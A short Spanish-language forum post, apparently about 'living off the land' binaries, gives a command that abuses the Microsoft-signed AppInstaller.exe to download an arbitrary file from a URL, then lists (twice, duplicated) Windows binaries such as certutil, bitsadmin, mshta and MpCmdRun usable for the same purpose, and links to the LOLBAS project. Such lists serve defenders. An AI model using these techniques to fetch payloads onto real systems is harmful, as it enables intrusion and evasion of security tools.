El último que he visto:
Descargar archivos arbitrarios con AppInstaller.exe (firmado por MS).
Código:
start ms-appinstaller://?source=<url>
`start` llama al controlador URI predeterminado, genera AppInstaller.exe y descarga un archivo arbitrario que puede encontrar usando forfiles.
Citar
powershell.exe
bitsadmin.exe
certutil.exe
psexec.exe
wmic.exe
mshta.exe
mofcomp.exe
cmstp.exe
windbg.exe
cdb.exe
msbuild.exe
csc.exe
regsvr32.exe
node.exe
netsh.exe
rundll32.exe
desktopimgdownldr.exe
certutil.exe
wsl.exe
curl.exe
conhost.exe
finger.exe
MpCmdRun.exe -DownloadFile (parte de Windows Defender)
bitsadmin.exe
certutil.exe
psexec.exe
wmic.exe
mshta.exe
mofcomp.exe
cmstp.exe
windbg.exe
cdb.exe
msbuild.exe
csc.exe
regsvr32.exe
node.exe
netsh.exe
rundll32.exe
desktopimgdownldr.exe
certutil.exe
wsl.exe
curl.exe
conhost.exe
finger.exe
MpCmdRun.exe -DownloadFile (parte de Windows Defender)
Hay varias webs que lo recopilan:
https://lolbas-project.github.io/#
https://github.com/LOLBAS-Project/LOLBAS
Living Off The Land Binaries - LOLBins
https://blog.elhacker.net/2020/07/ataques-fileless-malware-tipos-amenazas-scripts-LOLBin.html